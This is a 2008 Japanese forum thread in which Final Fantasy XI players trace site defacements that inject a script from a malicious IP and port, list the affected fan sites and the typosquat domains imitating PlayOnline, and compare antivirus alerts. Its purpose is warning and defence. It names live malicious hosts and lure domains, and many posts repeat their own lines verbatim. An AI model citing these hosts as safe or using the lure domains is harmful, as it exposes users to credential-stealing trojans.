サイトじたいは少しあとで開けましたがPG2のログには送信を61.238.148.112.88で
遮断してました。
過去レスで同じIPの話が出てましたけど、改竄攻撃再来でしょうか・・・
362 :既にその名前は使われています:2008/08/09(土) 00:52:35 ID:SBVfiTnC
ねっとべんりのとこだっけ?
トップから行ったら中身がなかったことはあるけど
地図に直にいったら普通に見られたんだよねぇ、何だったんだろうあれ
トップから行ったら中身がなかったことはあるけど
地図に直にいったら普通に見られたんだよねぇ、何だったんだろうあれ
363 :既にその名前は使われています:2008/08/09(土) 00:53:45 ID:SWZ6C4bE
>>361
>>284にあるウイルス置き場だな。
マップガイドのアドレスは正しかった?どこかのリンクから辿ったとかではないのなら
マップガイドのサイトもしくは広告枠あたりが改竄されてることになるね
あとブロックしてるから平気だろうけど一応スキャンかけておきなされ
>>284にあるウイルス置き場だな。
マップガイドのアドレスは正しかった?どこかのリンクから辿ったとかではないのなら
マップガイドのサイトもしくは広告枠あたりが改竄されてることになるね
あとブロックしてるから平気だろうけど一応スキャンかけておきなされ
364 :361:2008/08/09(土) 01:03:17 ID:I+oAOFKS
えっと、最初に見たときはIEででした。
いまFireFox+no scriptでしっかりありますね・・・「1039045744:88」が。
ソースを表示してみましたら一番下のほうにscriptで1039045744:88が埋め込まれてます。
うちのはサブPCでカスペ常駐でしたが無反応でした。
現在スキャン中ですけど何も出無そうな感じ。
いまFireFox+no scriptでしっかりありますね・・・「1039045744:88」が。
ソースを表示してみましたら一番下のほうにscriptで1039045744:88が埋め込まれてます。
うちのはサブPCでカスペ常駐でしたが無反応でした。
現在スキャン中ですけど何も出無そうな感じ。
365 :既にその名前は使われています:2008/08/09(土) 01:07:57 ID:86PTnna6
あそこはドメイン名は違うけどXREAだな。最近広告以外も改竄攻撃受けたとかなんとか。
だれか管理人にメールだしておいてくれー
俺はもうPC電源落としちまった
だれか管理人にメールだしておいてくれー
俺はもうPC電源落としちまった
366 :既にその名前は使われています:2008/08/09(土) 02:03:40 ID:uJsBTqre
天安門虐殺業者のオリンピック開会式age
取材中にじんみんかいほうぐんwから暴行受けたカメラマンと記者は全治1ヶ月の重症だそうです。
取材中にじんみんかいほうぐんwから暴行受けたカメラマンと記者は全治1ヶ月の重症だそうです。
367 :既にその名前は使われています:2008/08/09(土) 02:04:23 ID:6Om69Iqv
連絡先わかんねwwww
368 :既にその名前は使われています:2008/08/09(土) 02:05:09 ID:WKVNyc07
おいおい
HD交換して、カスペ入れてPG2入れてこれからFF復帰だぁー
って思ったら、FFのプレイボタンクリックしたとたんにカスペ反応;
キーロガーを検知しましたとか出た・・・
もーなんだよこりゃ
HD交換して、カスペ入れてPG2入れてこれからFF復帰だぁー
って思ったら、FFのプレイボタンクリックしたとたんにカスペ反応;
キーロガーを検知しましたとか出た・・・
もーなんだよこりゃ
369 :既にその名前は使われています:2008/08/09(土) 02:45:00 ID:WKVNyc07
>>368だけど、原因がわからないなぁ
プロアクティブディフェンスのイベント見ると、pol.exeにちょっかいだしてるみたいで
処理内容はキーロガーを検知しました、プロセスはキーボード入力の出力先を変更しようと
していますとか書いてあるんだけれども・・・
プレイヤーの皆様へからゲームに切り替わるタイミングで必ず警告が出る。
誰か詳しい人いますか?
プロアクティブディフェンスのイベント見ると、pol.exeにちょっかいだしてるみたいで
処理内容はキーロガーを検知しました、プロセスはキーボード入力の出力先を変更しようと
していますとか書いてあるんだけれども・・・
プレイヤーの皆様へからゲームに切り替わるタイミングで必ず警告が出る。
誰か詳しい人いますか?
370 :既にその名前は使われています:2008/08/09(土) 02:47:12 ID:q1Pi0+7+
バックアップファイルに紛れ込んでたんじゃないの
どうせpolフォルダ丸ごとバックアップとかしてたんでしょ
どうせpolフォルダ丸ごとバックアップとかしてたんでしょ
371 :既にその名前は使われています:2008/08/09(土) 02:55:47 ID:WKVNyc07
372 :既にその名前は使われています:2008/08/09(土) 03:10:12 ID:CWs00r68
ぶっちゃけると、キーロガーチェックしてるなら反応しないやつはいない
キーロガーがなんでもかんでも悪ってわけじゃないからな
キーロガーがなんでもかんでも悪ってわけじゃないからな
373 :既にその名前は使われています:2008/08/09(土) 03:42:00 ID:zznGrXD7
FF便利ガイドの方も1039045744:88のスクリプトがあるな
どこに張ってるんだこれ
どこに張ってるんだこれ
374 :既にその名前は使われています:2008/08/09(土) 03:43:54 ID:WKVNyc07
375 :既にその名前は使われています:2008/08/09(土) 08:09:58 ID:4CsqG5pP
>>374
インターネットへの物理的接続をしたまま無印XPインストールしちゃったとか?
>>372
悪じゃないキーロガーって言うと何?どんなの?
ID:WKVNyc07がナンか便利なツールを使っていてそれが引っかかるって事?
インターネットへの物理的接続をしたまま無印XPインストールしちゃったとか?
>>372
悪じゃないキーロガーって言うと何?どんなの?
ID:WKVNyc07がナンか便利なツールを使っていてそれが引っかかるって事?
376 :既にその名前は使われています:2008/08/09(土) 08:46:43 ID:vYdvifQl
>>373
フッターのテーブルの中
<TR>
<TD colspan="5" bgcolor="#d5ffd5" align="left" height="20" class="waku0"> 当ホームページに記載されている会社名・製品名・システム名などは、各社の登録商標、もしくは商標です。 Copyright
(C) 2002-2008 SQUARE ENIX CO., LTD. All Rights
Reserved.</TD>【ここにスクリプトへのリンク】
</TR>
</td>と</tr>の間なんて どやったら・・
吟遊詩人さんとこは メニューとヘッダにテーブルないしなぁ。 サーバもs41と s112
フラッシュ広告が悪さしただけじゃなくて htmlソースに影響を与えたってことなんだろうか
フッターのテーブルの中
<TR>
<TD colspan="5" bgcolor="#d5ffd5" align="left" height="20" class="waku0"> 当ホームページに記載されている会社名・製品名・システム名などは、各社の登録商標、もしくは商標です。 Copyright
(C) 2002-2008 SQUARE ENIX CO., LTD. All Rights
Reserved.</TD>【ここにスクリプトへのリンク】
</TR>
</td>と</tr>の間なんて どやったら・・
吟遊詩人さんとこは メニューとヘッダにテーブルないしなぁ。 サーバもs41と s112
フラッシュ広告が悪さしただけじゃなくて htmlソースに影響を与えたってことなんだろうか
377 :既にその名前は使われています:2008/08/09(土) 10:08:28 ID:SWZ6C4bE
fc2のときみたいに見つけ次第リストにしとく?
管理人への通報の有無と一緒に
管理人への通報の有無と一緒に
378 :既にその名前は使われています:2008/08/09(土) 10:31:23 ID:SWZ6C4bE
あと自分でソース確認できる方法も一応書いとくよ。
昔はアドレス欄のview-sourceで開けたんだけど、SP2以降?は駄目になったはず。
テキストエディタ(何でもいいと思うけど俺はTeraPad)で「ファイルを開く」を選択
↓
ファイル名の欄にチェックしたいページのURL
他にもオンラインで似たようなことをやってくれるサイトもある。けどXREAだから紹介はしない
昔はアドレス欄のview-sourceで開けたんだけど、SP2以降?は駄目になったはず。
テキストエディタ(何でもいいと思うけど俺はTeraPad)で「ファイルを開く」を選択
↓
ファイル名の欄にチェックしたいページのURL
他にもオンラインで似たようなことをやってくれるサイトもある。けどXREAだから紹介はしない
379 :既にその名前は使われています:2008/08/09(土) 10:39:42 ID:g6Cz8mCn
>>375
便利じゃないがRPG2000RTPとか
便利じゃないがRPG2000RTPとか
380 :既にその名前は使われています:2008/08/09(土) 11:03:32 ID:dM/nDh/w
381 :既にその名前は使われています:2008/08/09(土) 11:05:05 ID:WhlJUUoI
業者乙
382 :既にその名前は使われています:2008/08/09(土) 11:36:41 ID:4Pth7jtr
直リンすんな
業者乙
業者乙
383 :既にその名前は使われています:2008/08/09(土) 11:42:07 ID:y0+kSCLP
FF専用機のPC導入でボーナスの俺の遊ぶ分が
無くなってしまった
俺って経済力ヨエー
無くなってしまった
俺って経済力ヨエー
384 :既にその名前は使われています:2008/08/09(土) 11:42:25 ID:S80d16m3
>>380
アイス買ってきて
アイス買ってきて
385 :既にその名前は使われています:2008/08/09(土) 11:42:56 ID:lpAsvZ+t
FF専用機って・・・5万もあればたりないか?かわいそす
386 :既にその名前は使われています:2008/08/09(土) 11:43:21 ID:fT2xhvuH
POL起動してFF選択して「プレイ」押したら
青い画面の「同意する」とか選ぶ場面あるよね
その画面にいくとエラーでて強制終了させられるんだが、これ垢ハックと関係あるんかな…
ファイルチェックしてもなんにもでないんですが。
落されてまたPOLインしてプレイ押すと同じ感じで落とされて
20分くらい報知するとインできるようになる
青い画面の「同意する」とか選ぶ場面あるよね
その画面にいくとエラーでて強制終了させられるんだが、これ垢ハックと関係あるんかな…
ファイルチェックしてもなんにもでないんですが。
落されてまたPOLインしてプレイ押すと同じ感じで落とされて
20分くらい報知するとインできるようになる
387 :既にその名前は使われています:2008/08/09(土) 11:49:50 ID:gssHA1xc
登録情報なんかの本人しかわからい情報を、もー少し生かせられないかなぁ
パス変更するときに、すこし煩雑になってしまうかだけもだけど、それを入れてからじゃないと出来ない とか
もしプレイ中にPOLにログインされて落とされても、業者側はパスを変更することは出来ないから
もっかいログインしなおして、新たにパスを変更することも可能になるし、POLは後から入った方が有利ってのもプラスになる
まぁそれだと業者がログインしてる状態で繋いだ時に、こちらも気づかないかもしれないから
すでにログインされている状態で繋ごうとしたら、「すでにログインしていますが〜」とか警告が出れば良いんだしさ
パス変更するときに、すこし煩雑になってしまうかだけもだけど、それを入れてからじゃないと出来ない とか
もしプレイ中にPOLにログインされて落とされても、業者側はパスを変更することは出来ないから
もっかいログインしなおして、新たにパスを変更することも可能になるし、POLは後から入った方が有利ってのもプラスになる
まぁそれだと業者がログインしてる状態で繋いだ時に、こちらも気づかないかもしれないから
すでにログインされている状態で繋ごうとしたら、「すでにログインしていますが〜」とか警告が出れば良いんだしさ
388 :既にその名前は使われています:2008/08/09(土) 11:56:31 ID:sGEMIZOz
「+ + 激しく忍者スレテンプレ + +」もメニューが改竄されてjp.jsを開くようになってる。
389 :既にその名前は使われています:2008/08/09(土) 12:04:00 ID:vYdvifQl
XREA 1039045744:88 の確認されたサイト
吟遊詩人テンプレ:メニュー ヘッダー 対策済み
FF11・マップガイド(ネット便利)フッターテーブル内
黒魔協会:xml宣言の前
忍者スレテンプレ:メニュー </body>と</html>の間
吟遊詩人テンプレ:メニュー ヘッダー 対策済み
FF11・マップガイド(ネット便利)フッターテーブル内
黒魔協会:xml宣言の前
忍者スレテンプレ:メニュー </body>と</html>の間
390 :既にその名前は使われています:2008/08/09(土) 12:06:42 ID:86PTnna6
>>386
それはどっちかというと全画面モードかんけいじゃないかな
他に全画面モードで開いてるゲームとかない?
公式窓化だと窓モードにしてても他のアプリを全画面にしようとすると強制的に落ちるよ。
で、POLだけは平気なんだけどその「同意する」以降が他の全画面がアウトのはず。
ツクールのゲームとか古めの東方とかと並行できなくて結構不便
それはどっちかというと全画面モードかんけいじゃないかな
他に全画面モードで開いてるゲームとかない?
公式窓化だと窓モードにしてても他のアプリを全画面にしようとすると強制的に落ちるよ。
で、POLだけは平気なんだけどその「同意する」以降が他の全画面がアウトのはず。
ツクールのゲームとか古めの東方とかと並行できなくて結構不便
391 :既にその名前は使われています:2008/08/09(土) 12:23:03 ID:dM/nDh/w
直リンはまずかったね。申し訳ない。
392 :既にその名前は使われています:2008/08/09(土) 12:29:01 ID:AS/+arXS
393 :既にその名前は使われています:2008/08/09(土) 12:42:30 ID:WhlJUUoI
警告のつもりでも直リンは即NG
異論、反論は認めない
異論、反論は認めない
394 :既にその名前は使われています:2008/08/09(土) 12:53:06 ID:AS/+arXS
>>386
マザボやビデオカードが熱とかでイカレてんじゃね?
マザボやビデオカードが熱とかでイカレてんじゃね?
395 :既にその名前は使われています:2008/08/09(土) 12:53:09 ID:DVrzeDyX
ギコナビとJaneでURLをリンク化させない方法はある?
396 :既にその名前は使われています:2008/08/09(土) 12:53:42 ID:NdNDJNBT
いまいちしくみがよくわかんない素人なんですけど
ウイルスソフト無くても
ウィンドウズアップデートとか
javaとかflashとか最新にしてたら
実行ボタンを自分で押さない限り
FFの今のアカハックのスパイウェアは防げますよね
ウイルスソフト無くても
ウィンドウズアップデートとか
javaとかflashとか最新にしてたら
実行ボタンを自分で押さない限り
FFの今のアカハックのスパイウェアは防げますよね
397 :既にその名前は使われています:2008/08/09(土) 12:55:48 ID:g6Cz8mCn
そんなの保証出来ないし別のに引っ掛かるけどな
398 :既にその名前は使われています:2008/08/09(土) 12:56:05 ID:4CsqG5pP
>>379
ググったらツクールで無料ゲームか。
何故それにキーロガーが必要なのかチと分からんが
何だかんだでやっぱり貧乏(性)なのが起因なんだな。
って、実際ID:WKVNyc07が何やってるのか知らんが。
>>385
五万ならFF11以外専用機にするな、ナンか不安だw
同じ五万ならリムーバブルHDDとそれに乗せるOS、セキュリティソフト、
atokあたり買って使い分けた方が良いかな、俺は。
ググったらツクールで無料ゲームか。
何故それにキーロガーが必要なのかチと分からんが
何だかんだでやっぱり貧乏(性)なのが起因なんだな。
って、実際ID:WKVNyc07が何やってるのか知らんが。
>>385
五万ならFF11以外専用機にするな、ナンか不安だw
同じ五万ならリムーバブルHDDとそれに乗せるOS、セキュリティソフト、
atokあたり買って使い分けた方が良いかな、俺は。
399 :既にその名前は使われています:2008/08/09(土) 12:56:19 ID:u6Fwnsea
ふせげねーよボケ;;
400 :既にその名前は使われています:2008/08/09(土) 13:02:05 ID:AS/+arXS
>>396
バージョン1.00リリース
バージョン1.00の穴が見つかる
バージョン2.00リリース
バージョン1.00の穴を使ったウイルスが出る
という順ならそうなんだけど
バージョン1.00リリース
バージョン1.00の穴が見つかる
バージョン1.00の穴を使ったウイルスが出る ←今ここ
バージョン2.00リリースにご期待ください!
となったらどうしようもありません(ゼロデイ)。
バージョン1.00リリース
バージョン1.00の穴が見つかる
バージョン2.00リリース
バージョン1.00の穴を使ったウイルスが出る
という順ならそうなんだけど
バージョン1.00リリース
バージョン1.00の穴が見つかる
バージョン1.00の穴を使ったウイルスが出る ←今ここ
バージョン2.00リリースにご期待ください!
となったらどうしようもありません(ゼロデイ)。
401 :既にその名前は使われています:2008/08/09(土) 13:12:35 ID:upYVR4fp
>>396
「ウイルスソフト無くても」
金出さなくてもチェックする方法はいくらでもある。
「最新にしてたら」
そういうヤツ程ツールが古い。
「実行ボタンを自分で押さない限り」
ハックする方だって馬鹿じゃない。
「防げますよね」
それが一番危険な考え方。
「ウイルスソフト無くても」
金出さなくてもチェックする方法はいくらでもある。
「最新にしてたら」
そういうヤツ程ツールが古い。
「実行ボタンを自分で押さない限り」
ハックする方だって馬鹿じゃない。
「防げますよね」
それが一番危険な考え方。
402 :既にその名前は使われています:2008/08/09(土) 13:14:57 ID:rpgB/WsJ
403 :既にその名前は使われています:2008/08/09(土) 13:26:02 ID:AS/+arXS
うーん…。
>>389 を一通り見てきたけど、これはジョブ戦術板をぱっと見て
テンプレサイトがXREAならはい書き換え〜みたいに
XREA上のサイトなら自由に書き換えられる気がするな、この犯人。
広告改竄の時も「こいつ…デキる(キリッ」とか思ったけど、まずいよこれ。
# なんかアクセスがいっぱいあると思ったら詩人テンプレからいっぱい来てた(;^ω^)
>>389 を一通り見てきたけど、これはジョブ戦術板をぱっと見て
テンプレサイトがXREAならはい書き換え〜みたいに
XREA上のサイトなら自由に書き換えられる気がするな、この犯人。
広告改竄の時も「こいつ…デキる(キリッ」とか思ったけど、まずいよこれ。
# なんかアクセスがいっぱいあると思ったら詩人テンプレからいっぱい来てた(;^ω^)
404 :既にその名前は使われています:2008/08/09(土) 13:26:22 ID:f8OpFh7o
無料有料問わず何もセキュリティーソフトを入れていないことに驚き
405 :既にその名前は使われています:2008/08/09(土) 13:28:02 ID:bIfNZ9Ef
>>374
何スレ前かもう覚えてないけど、
キーロガーの検知有効にしたらpolでキーロガー検知したけど、信頼リストに入れて大丈夫だよね?
と質問したら問題ないとレス返されたので、そのまま信頼リストに入れて今現在まで問題なくプレイできてる。
カスペが本当にキーロガー検知してるのか、勘違いなのかはわからないw
何スレ前かもう覚えてないけど、
キーロガーの検知有効にしたらpolでキーロガー検知したけど、信頼リストに入れて大丈夫だよね?
と質問したら問題ないとレス返されたので、そのまま信頼リストに入れて今現在まで問題なくプレイできてる。
カスペが本当にキーロガー検知してるのか、勘違いなのかはわからないw
406 :既にその名前は使われています:2008/08/09(土) 13:29:00 ID:vYdvifQl
>>396 煽り?w
そんなんで防げるなら このスレがパート35までくるわけないじゃんw
しかもハックの手段はどんどん変わるから 点や線じゃなくて面で予防するためにここで情報共有してるの
だから 自分で大丈夫と思うならわざわざここで聞く必要はないよ。
誰かに大丈夫って言って欲しいのか?そんでいざハックされたら ここで大丈夫って言われたとでも言うのか?
そんなんで防げるなら このスレがパート35までくるわけないじゃんw
しかもハックの手段はどんどん変わるから 点や線じゃなくて面で予防するためにここで情報共有してるの
だから 自分で大丈夫と思うならわざわざここで聞く必要はないよ。
誰かに大丈夫って言って欲しいのか?そんでいざハックされたら ここで大丈夫って言われたとでも言うのか?
407 :既にその名前は使われています:2008/08/09(土) 13:31:00 ID:AS/+arXS
あとジョブ板の該当ジョブスレで警告発してくれた人ありがとう。
そこまで気が回らなかった。
そこまで気が回らなかった。
408 :既にその名前は使われています:2008/08/09(土) 13:51:34 ID:AS/+arXS
XREAのあれ、昨夜トロイが更新。
新型はNorton検知・バスター脱落(旧型は逆)。
ttp://www.virustotal.com/analisis/71ffc7eb2711f142889fcf9348212e17
まだ反映されていないけど、AntiVirは「TR/Drop.OnLineGa.35」あるいは
「TR/PSW.OnlineGa.eaa」で撃破予定と返答あり。
新型はNorton検知・バスター脱落(旧型は逆)。
ttp://www.virustotal.com/analisis/71ffc7eb2711f142889fcf9348212e17
まだ反映されていないけど、AntiVirは「TR/Drop.OnLineGa.35」あるいは
「TR/PSW.OnlineGa.eaa」で撃破予定と返答あり。
409 :既にその名前は使われています:2008/08/09(土) 13:53:59 ID:767RmAvt
avastやめてカスペに乗り換えようとしたとき
カスペがキーロガーがどうのレジストリがどうのと聞いてきて
対処不明だったうえにPOLのウィンドウがバグってしまったよ
んで一日前にシステム復元したらPOLは元通り
当日に復元したらやっぱバグる
ってのを繰り返してたらシステムが壊れたw
だからどうしたといわれても困るが
カスペがキーロガーがどうのレジストリがどうのと聞いてきて
対処不明だったうえにPOLのウィンドウがバグってしまったよ
んで一日前にシステム復元したらPOLは元通り
当日に復元したらやっぱバグる
ってのを繰り返してたらシステムが壊れたw
だからどうしたといわれても困るが
410 :既にその名前は使われています:2008/08/09(土) 13:55:11 ID:AS/+arXS
システムの復元はMe以来信用してないw
411 :既にその名前は使われています:2008/08/09(土) 14:28:04 ID:WhlJUUoI
システムの復元はおばちゃんの厚化粧と同じ
厚く塗ったり落としたり繰り返して遠目にはそれなりに見えるが・・・
厚く塗ったり落としたり繰り返して遠目にはそれなりに見えるが・・・
412 :既にその名前は使われています:2008/08/09(土) 14:46:52 ID:vYdvifQl
ミュモルブログさんが来てたのか
解析いつも乙&あざーっす。
パターンファイル名から見ると flash広告のときの(orz.exeになるヤツ)と同一だったのが
夜の間に生まれ変わったってことすかね。
汚染ルートが また広告鯖がらみなのか 鯖そのものなのか
ピンポイントなのか 気になって眠れないw
解析いつも乙&あざーっす。
パターンファイル名から見ると flash広告のときの(orz.exeになるヤツ)と同一だったのが
夜の間に生まれ変わったってことすかね。
汚染ルートが また広告鯖がらみなのか 鯖そのものなのか
ピンポイントなのか 気になって眠れないw
413 :既にその名前は使われています:2008/08/09(土) 14:49:27 ID:8bc5sT3i
素人を自称するならなおさらアンチウイルスソフトいれておけ
んなもんをケチるな
んなもんをケチるな
414 :既にその名前は使われています:2008/08/09(土) 14:52:13 ID:SWZ6C4bE
>>412
ミュモルブログwwwwww
いつもの人も注意喚起班の人もおつー。
改竄部位を見るにそれぞれ違う場所っぽいし、XREAにあるFF関連をピンポイントで狙ってるんじゃないかな。
XREAのサーバーにイタズラする技術なら既に持ち合わせてそうだしね。
ソース調べようとして間違えてクリックしてページ開いた俺涙目
ミュモルブログwwwwww
いつもの人も注意喚起班の人もおつー。
改竄部位を見るにそれぞれ違う場所っぽいし、XREAにあるFF関連をピンポイントで狙ってるんじゃないかな。
XREAのサーバーにイタズラする技術なら既に持ち合わせてそうだしね。
ソース調べようとして間違えてクリックしてページ開いた俺涙目
415 :既にその名前は使われています:2008/08/09(土) 14:57:24 ID:SWZ6C4bE
それと、垢ハックスレを見ない人にも目を留めてもらうために、
もう少し改竄ページとかがはっきりしたらまた別スレ建てたほうがいいかもしれんね
あと、1039045744をぐぐっても注意喚起のページばっかり出るんだけど、
bodyタグあたりにしこんだタグはロボット検索に引っかからないとかある?
もしかしたらそういう意図で特定の部位に仕込んでたりするのかな?
もう少し改竄ページとかがはっきりしたらまた別スレ建てたほうがいいかもしれんね
あと、1039045744をぐぐっても注意喚起のページばっかり出るんだけど、
bodyタグあたりにしこんだタグはロボット検索に引っかからないとかある?
もしかしたらそういう意図で特定の部位に仕込んでたりするのかな?
416 :既にその名前は使われています:2008/08/09(土) 15:29:51 ID:W8h0gMNp
417 :既にその名前は使われています:2008/08/09(土) 15:31:57 ID:SegjDfFs
^^;
418 :既にその名前は使われています:2008/08/09(土) 15:32:30 ID:SWZ6C4bE
419 :既にその名前は使われています:2008/08/09(土) 15:36:35 ID:jg9R2RDj
こんなんでも踏む奴いそうだな・・・
420 :既にその名前は使われています:2008/08/09(土) 15:49:02 ID:M5O/nIrB
このスレに張っても検体提出してるようなものなのにな。
421 :既にその名前は使われています:2008/08/09(土) 15:50:38 ID:WhlJUUoI
422 :既にその名前は使われています:2008/08/09(土) 15:52:20 ID:ApaqC/qE
業者さんも毎日のノルマ大変っすね^^;;;
423 :既にその名前は使われています:2008/08/09(土) 15:58:14 ID:S80d16m3
感染したい人は踏めばいい
424 :既にその名前は使われています:2008/08/09(土) 16:40:27 ID:uGhrjCDj
wgetしてみたが普通にhtmlソースだな。
面倒だから中見てないけど踏まないに越したことは無い。
面倒だから中見てないけど踏まないに越したことは無い。
425 :既にその名前は使われています:2008/08/09(土) 16:57:55 ID:W8h0gMNp
ただの注意喚起です^^;
存在しないからhttp://www.pleyonline.com/に飛びますw
存在しないからhttp://www.pleyonline.com/に飛びますw
426 :既にその名前は使われています:2008/08/09(土) 16:58:19 ID:WKVNyc07
>>375
374ですが、ネットに繋いだのはXPインスコ後カスペ導入時とXPアップデート時
のみで、PG2とかは他PCで落としたのを移動して来たのをインスコしたので、
本当にWEB閲覧とかは無しですね。
あとツールとかなんですかそれ?って感じなんですが・・・
そういう知識全く無いので使うはずも無い訳でw
>>405
情報有難う御座います。
なんか他の所色々と見てたら、どうもカスペのキーロガーの検知にチェック入れてると
反応するってのは書かれてました。
どうもそういう使用みたいですね。
ということなら・・・大丈夫なんですかね
374ですが、ネットに繋いだのはXPインスコ後カスペ導入時とXPアップデート時
のみで、PG2とかは他PCで落としたのを移動して来たのをインスコしたので、
本当にWEB閲覧とかは無しですね。
あとツールとかなんですかそれ?って感じなんですが・・・
そういう知識全く無いので使うはずも無い訳でw
>>405
情報有難う御座います。
なんか他の所色々と見てたら、どうもカスペのキーロガーの検知にチェック入れてると
反応するってのは書かれてました。
どうもそういう使用みたいですね。
ということなら・・・大丈夫なんですかね
427 :既にその名前は使われています:2008/08/09(土) 17:02:02 ID:SWZ6C4bE
428 :既にその名前は使われています:2008/08/09(土) 17:02:17 ID:D/9nYSfi
>>425
pleyになっちゃってるぞ^^
pleyになっちゃってるぞ^^
429 :既にその名前は使われています:2008/08/09(土) 17:03:34 ID:D/9nYSfi
罠サイト誘導しようとしてる奴ってまじで業者?
JPの糞がやってんなら通報したら逮捕じゃね?w
JPの糞がやってんなら通報したら逮捕じゃね?w
430 :既にその名前は使われています:2008/08/09(土) 17:12:39 ID:3zbSgyla
>>375
どんなの?も何もPOL.EXE自体が悪じゃないキーロガーだよって話。
どんなの?も何もPOL.EXE自体が悪じゃないキーロガーだよって話。
431 :既にその名前は使われています:2008/08/09(土) 17:13:58 ID:u6Fwnsea
垢ハックして外人になりすましてるやつがいるぞ
432 :既にその名前は使われています:2008/08/09(土) 17:15:12 ID:WKVNyc07
433 :既にその名前は使われています:2008/08/09(土) 17:18:08 ID:PfsGt+nH
>>425
その手のミスタイプや見間違い狙った罠ドメインは山ほどあるからシャレにならねーんだよ
実際にあった例は
playenline、play0nlnie、playon1ine、playonlanei、playonlinenc、playonlino、playonlnie
最近じゃyoutube狙った
www■youturebe■comやらwww■youtubles■net
なんかがある
その手のミスタイプや見間違い狙った罠ドメインは山ほどあるからシャレにならねーんだよ
実際にあった例は
playenline、play0nlnie、playon1ine、playonlanei、playonlinenc、playonlino、playonlnie
最近じゃyoutube狙った
www■youturebe■comやらwww■youtubles■net
なんかがある
434 :既にその名前は使われています:2008/08/09(土) 17:19:10 ID:Ef2b8rFw
逮捕記念age
435 :既にその名前は使われています:2008/08/09(土) 17:21:24 ID:S8wuFaOd
ワールド移転されて謎の外人LSに放り込まれてた
Hiじゃねーよカス!!!!!!!!!1111
Hiじゃねーよカス!!!!!!!!!1111
436 :既にその名前は使われています:2008/08/09(土) 17:23:31 ID:zznGrXD7
いくつかのFFブログに中華スクリプトが見つかった
週末確実狙われてるな、とりあえずブログ系も自己責任で見ろだな
週末確実狙われてるな、とりあえずブログ系も自己責任で見ろだな
437 :既にその名前は使われています:2008/08/09(土) 17:24:33 ID:SWZ6C4bE
>>436
そういうときはどこのブログが教えてくれよw
そういうときはどこのブログが教えてくれよw
438 :既にその名前は使われています:2008/08/09(土) 17:26:03 ID:ElInmB/H
439 :既にその名前は使われています:2008/08/09(土) 17:32:17 ID:3zbSgyla
>>432
yes
yes
440 :既にその名前は使われています:2008/08/09(土) 17:32:22 ID:W8h0gMNp
PCでFF遣るのは字札行為だぞ?
441 :既にその名前は使われています:2008/08/09(土) 18:13:45 ID:ApaqC/qE
442 :既にその名前は使われています:2008/08/09(土) 18:36:27 ID:73rJmmal
業者しねよ
443 :既にその名前は使われています:2008/08/09(土) 21:24:39 ID:eUF4xW0M
鯖番がばらけている事、挿入位置には法則性がなさげな事、XREAのみである事等から
サーバがクラックされている可能性が高い気がする。また、『外部委託』でなんちゃらなんだろうか。
前の件も含め、これでほぼ無料鯖サービスは廃止になるんじゃないかねぇ・・・(常識があればそうするだろうな)。
サーバがクラックされている可能性が高い気がする。また、『外部委託』でなんちゃらなんだろうか。
前の件も含め、これでほぼ無料鯖サービスは廃止になるんじゃないかねぇ・・・(常識があればそうするだろうな)。
444 :既にその名前は使われています:2008/08/09(土) 21:44:48 ID:SWZ6C4bE
>>443
今回やられてるところは無料のとこ?
今回やられてるところは無料のとこ?
445 :既にその名前は使われています:2008/08/09(土) 21:47:51 ID:4yOU/WQJ
すいません、ちょっとお聞きします。
pcでffやっているんですが、さっき有名攻略サイト(エレ○ン)から忍者サイトへリンクした際、
ウィルスソフトに「ネット詐欺の可能性があります」とでたので、ブロックする と選択しました。
で、いまログインしている状態なんですが、ログアウトして大丈夫でしょうか?
身近でアカウントハックがあったので不安なんです…教えてください、よろしくお願いします。
pcでffやっているんですが、さっき有名攻略サイト(エレ○ン)から忍者サイトへリンクした際、
ウィルスソフトに「ネット詐欺の可能性があります」とでたので、ブロックする と選択しました。
で、いまログインしている状態なんですが、ログアウトして大丈夫でしょうか?
身近でアカウントハックがあったので不安なんです…教えてください、よろしくお願いします。
446 :既にその名前は使われています:2008/08/09(土) 21:50:27 ID:SWZ6C4bE
447 :既にその名前は使われています:2008/08/09(土) 21:56:06 ID:PfsGt+nH
>>445
とりあえず>>389のサイトが8月頭から直接改竄を受けて、
危険サイトへ強制アクセスさせる罠が仕込まれた状態にある
パス盗まれてりゃそいつで後出しログインされれば強制的に落とされるんだから
さっさとログアウトしてPC内のウィルスチェックなりなんなりしたほうがいいと思うが
とりあえず>>389のサイトが8月頭から直接改竄を受けて、
危険サイトへ強制アクセスさせる罠が仕込まれた状態にある
パス盗まれてりゃそいつで後出しログインされれば強制的に落とされるんだから
さっさとログアウトしてPC内のウィルスチェックなりなんなりしたほうがいいと思うが
448 :既にその名前は使われています:2008/08/09(土) 21:56:15 ID:u6Fwnsea
忍者のテンプレサイト改ざんされてたぞ
449 :既にその名前は使われています:2008/08/09(土) 21:57:28 ID:PfsGt+nH
>>446
エレメンでリンクされてる忍者サイトっつったら激しく忍者テンプレくらいしかないぞう
エレメンでリンクされてる忍者サイトっつったら激しく忍者テンプレくらいしかないぞう
450 :既にその名前は使われています:2008/08/09(土) 21:58:03 ID:g6Cz8mCn
汚いな業者さすが汚い
451 :既にその名前は使われています:2008/08/09(土) 21:58:52 ID:SWZ6C4bE
452 :既にその名前は使われています:2008/08/09(土) 22:02:15 ID:YvY8FaYM
戦術板の忍者スレの方でも話題が出ているね。前の詩人スレの時と同様じゃなかろうか。
453 :既にその名前は使われています:2008/08/09(土) 22:06:33 ID:PfsGt+nH
454 :既にその名前は使われています:2008/08/09(土) 22:12:45 ID:PyaJzTNi
また被害が拡大するのかよw
■eはユーザーに脅しかけたり無関係の一般人と裁判してる暇があったら
さっさと業者潰せよ
■eはユーザーに脅しかけたり無関係の一般人と裁判してる暇があったら
さっさと業者潰せよ
455 :既にその名前は使われています:2008/08/09(土) 22:12:46 ID:AS/+arXS
黒スレと詩人スレと忍者スレのテンプレだね
456 :既にその名前は使われています:2008/08/09(土) 22:17:14 ID:AS/+arXS
>>453
話題沸騰というか、ここと掛け持ちの人しか騒いでない気がする
話題沸騰というか、ここと掛け持ちの人しか騒いでない気がする
457 :既にその名前は使われています:2008/08/09(土) 22:26:13 ID:SBVfiTnC
まあ関係のない人には他人がパス抜かれたってどうでもいいんだろ
自分がウイルス撒き散らしていようとも
自分がウイルス撒き散らしていようとも
458 :既にその名前は使われています:2008/08/09(土) 22:40:30 ID:W8h0gMNp
ゼリアとエフシーは今も昔もやばやばです
459 :既にその名前は使われています:2008/08/09(土) 22:43:37 ID:4yOU/WQJ
ありがとうございます。
まさにそのテンプレサイトです…。
とりあえずウィルスチェックしてみますm(__)m
まさにそのテンプレサイトです…。
とりあえずウィルスチェックしてみますm(__)m
